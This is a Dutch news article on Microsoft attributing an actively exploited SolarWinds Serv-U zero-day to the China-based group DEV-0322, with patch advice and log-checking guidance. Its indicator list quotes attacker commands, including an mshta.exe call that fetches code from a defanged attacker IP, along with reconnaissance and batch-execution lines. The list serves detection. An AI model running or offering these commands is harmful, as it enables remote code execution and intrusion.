Microsoft: Chinese hackers zitten achter nieuwe SolarWinds-aanval
SolarWinds bracht afgelopen maandag een patch uit voor een nieuw gevonden gat in zijn Serv-U Managed File Transfer- en Serv-U Secure FTP-producten. De kwetsbaarheid is op afstand te misbruiken en laat aanvallers met diepgaande rechten eigen code uitvoeren op het onderliggende systeem. Volgens SolarWinds kan een inbreker zo programma's installeren, data bekijken, veranderen en wissen, en programma's draaien. Het gat wordt al actief misbruikt.
De zeroday werd ontdekt door beveiligingsonderzoekers van Microsoft, dat nu meer informatie geeft over het probleem. Microsoft zegt er redelijk zeker van te zijn dat de groep die het gat misbruikt onderdeel uitmaakt van de hackergroep 'DEV-0322'. DEV staat voor "development group", een term die wordt gebruikt voor nog niet-geïdentificeerde aanvalsgroepen. Iedere DEV-groep krijgt zijn eigen unieke nummer, zodat deze gevolgd kan worden.
Volgens Microsoft komt DEV-0322 uit China en gebruiken ze commerciële VPN-oplossingen en gecompromitteerde routers van consumenten bij hun aanvallen. De groep heeft volgens Microsoft tot nu toe de Amerikaanse Defensie-industrie en softwarebedrijven als doelwit gehad.
Advies: onderzoek logs
Microsoft beschrijft verder hoe gebruikers kunnen zien of er een aanvalspoging is gedaan. Daarvoor moeten gebruikers het Serv-U-logbestand DebugSocketLog.txt bekijken en zoeken naar een melding als "C0000005; CSUSSHSocket::ProcessReceive". Deze melding kan aanduiden dat er een aanvalspoging is gedaan, maar kan ook om andere redenen opduiken. Mocht de melding gevonden worden, dan adviseert Microsoft echter sowieso om de logs verder te onderzoeken op signalen van misbruik. Het gaat om de volgende indicatoren:
- 98[.]176[.]196[.]89
- 68[.]235[.]178[.]32
- 208[.]113[.]35[.]58
- 144[.]34[.]179[.]162
- 97[.]77[.]97[.]58
- hxxp://144[.]34[.]179[.]162/a
- C:\Windows\Temp\Serv-U.bat
- C:\Windows\Temp\test\current.dmp
- The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- cmd.exe /c whoami > “./Client/Common/redacted.txt”
- cmd.exe /c dir > “.\Client\Common\redacted.txt”
- cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
- powershell.exe C:\Windows\Temp\Serv-U.bat
- cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
SolarWinds heeft maandag al een patch (HF2) uitgebracht voor de kwetsbaarheid. Die hotfix is beschikbaar in het klantportaal voor organisaties die een onderhoudscontract bij SolarWinds hebben. Wie dat niet heeft, krijgt het advies om een ticket in te dienen bij de klantenservice. Het dringende advies is om de hotfix meteen te installeren.
Reacties
Om een reactie achter te laten is een account vereist.
Inloggen Word abonnee